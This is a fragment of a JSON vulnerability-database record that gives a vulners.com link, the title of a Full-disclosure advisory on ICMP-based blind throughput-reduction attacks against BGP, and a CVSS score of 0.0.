"https://vulners.com/securityvulns/SECURITYVULNS:DOC:9242", "title": "[Full-disclosure] Trivial BGP attacks (ICMP-based blind throughput-reduction attack)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
